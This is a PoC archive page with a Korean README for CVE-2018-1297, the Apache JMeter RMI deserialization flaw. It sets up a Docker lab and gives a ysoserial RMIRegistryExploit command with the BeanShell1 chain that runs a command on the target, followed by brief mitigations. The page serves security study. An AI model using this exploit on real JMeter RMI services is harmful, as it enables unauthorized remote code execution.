Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-1297 PoC — Apache JMeter 安全漏洞

Source
Associated Vulnerability
Title:Apache JMeter 安全漏洞 (CVE-2018-1297)
Description:When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get Access to JMeterEngine and send unauthorized code.
Readme
#
**<h1>Jmeter RMI 역직렬화 명령 실행 취약성 (CVE-2018-1297)</h1><br/>**
<br/>
Apache JMeter는 미국 아파치 소프트웨어 재단(American Apache Software Foundation)이 스트레스 테스트 및 성능 테스트를 위해 Java 언어로 작성한 오픈 소스 소프트웨어 세트입니다.<br/>
2.x 및 3.x 버전에는 역직렬화 취약점이 있으며, 공격자는 이 취약점을 이용하여 대상 서버에서 임의의 명령을 실행할 수 있습니다.<br/>
<br/>
<h2>취약성 환경 실행 :</h2><br/>

```
docker compose up -d
```
저는 칼리 리눅스에서 docker를 이용했습니다.<br/>
<br/>
실행이 완료되면 RMI 서비스가 시작되고 포트 1099를 수신합니다.<br/>
<br/>
<br/>
<h2>취약점 :</h2><br/>
ysoserial을 직접 사용하여 취약점 공격을 시행합니다.<br/>

```
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success’
```
위와 같은 명령어를 입력합니다.<br/> BeanShell1이라는 익스플로잇 체인을 이용했습니다.<br/>

```
docker compose exec jmeter bash
```
를 사용하여 컨테이너에 들어가면 '/tmp/success'가 성공적으로 생성된 것을 알 수 있습니다.<br/>
<img src = "https://user-images.githubusercontent.com/145894541/279195673-1a78ed24-c344-4ff7-842e-bdd592760078.jpg" width="90%"></img>
<br/>
<img src = "https://user-images.githubusercontent.com/145894541/279195860-68289fe6-82e7-4d12-9ee5-c92f3d1a9ba8.jpg" width="90%"></img>
#
<br/>
<h2>정리</h2> <br/>
이 취약점은 Java 기반의 애플리케이션에서 발생할 수 있는 RMI(Remote Method Invocation) 취약점을 악용하는 것입니다.<br/>
여기에서 사용된 ‘ysoserial-0.0.6-SNAPSHOT-all.jar’는 ysoserial 프로젝트의 일부이며, java 직렬화 취약점을 악용하여 원격 코드 실행을 허용하는 페이로드를 생성하는 데 사용됩니다.<br/>
<br/>
이 페이로드는 /tmp/success와 같은 명령을 실행하려는 목적을 가지고 있으며, 이 취약점을 통해 공격자는 원격 시스템에서 임의의 명령을 실행하거나 시스템 파일을 수정할 수 있습니다.<br/>
이 취약점을 방해하기 위한 조치로는 RMI 서비스의 액세스 제한, 엄격한 권한 제어 및 java 직렬화 필터링 등이 있습니다.<br/>


File Snapshot

[4.0K] /data/pocs/70a22ab4438d3ac530214ef51ae5672b7a4a1e77 ├── [ 25K] 이미지 2023. 10. 31. 오전 5.47.jpg ├── [ 51K] 이미지 2023. 10. 31. 오전 5.59.jpg ├── [1.9K] CVE-2018-1297 ├── [2.3K] README.md ├── [ 25K] 이미지 2023. 10. 31. 오전 5.47.jpg └── [ 51K] 이미지 2023. 10. 31. 오전 5.59.jpg 0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →